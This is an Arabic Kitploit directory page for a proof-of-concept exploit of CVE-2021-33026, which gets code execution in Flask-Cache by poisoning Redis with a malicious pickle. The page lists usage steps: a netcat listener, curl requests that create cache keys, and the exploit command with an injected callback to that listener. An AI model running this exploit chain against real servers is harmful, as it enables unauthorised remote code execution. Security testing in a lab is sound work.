Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
FlaskCache_CVE-2021-33026_POC — إثبات مفهوم (PoC) لاستغلال CVE-2021-33026 الذي يسمم ذاكرة التخزين المؤقت لـ Redis في Flask-Cache لتحقيق تنفيذ التعليمات البرمجية عن بُعد عبر إلغاء تسلسل pickle خبيث. | Kitploit
أدوات/GitHubGitHub/agilevatester/flaskcache_cve-2021-33026_poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubagilevatester/flaskcache_cve-2021-33026_poc

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

FlaskCache_CVE-2021-33026_POC

إثبات مفهوم (PoC) لاستغلال CVE-2021-33026 الذي يسمم ذاكرة التخزين المؤقت لـ Redis في Flask-Cache لتحقيق تنفيذ التعليمات البرمجية عن بُعد عبر إلغاء تسلسل pickle خبيث.

عرض المستودع
17منذ 8 أشهرلم تتم المراجعة بعد
مشاركة

Pickle Serialization Remote Code Execution - Redis Poisoning PoC Exploit


تحقق من أن خادم redis يعمل

redis-cli -h 127.0.0.1 -p 6379 ping

redis-cli keys *

redis-cli get [Keyid]


ابدأ بالاستماع على netcat في المنفذ 10001 :

nc -nvlp 10001


إعداد البيئات لـ Flask Chache

python -m venv venv_flask_cache_<lib_ver>

source venv_flask_cache_<lib_ver>\scripts\activate

pip install -r <requirement.txt>

إعداد البيئات لـ Flask Chache 2.3.0

شغّل تطبيق Flask وأنشئ مفتاح cache :

flask run

curl --header "Content-Type: application/json" --request POST --data {"key":"Cachelib_2.3"} http://localhost:5000/cache/new

احصل على قيمة مفتاح cache من تطبيق Flask

curl --request GET http://localhost:5000/cache/[key]

استغلال Flask Cache عن طريق تسميم Redis Cache :

cve-2021-33026_PoC.py --rhost 127.0.0.1 --rport 5000 --cacheType redis --cmd "curl http://localhost:10001" --id 41685a90-434e-4d70-9a08-35b78025e09a

تنزيل الأداة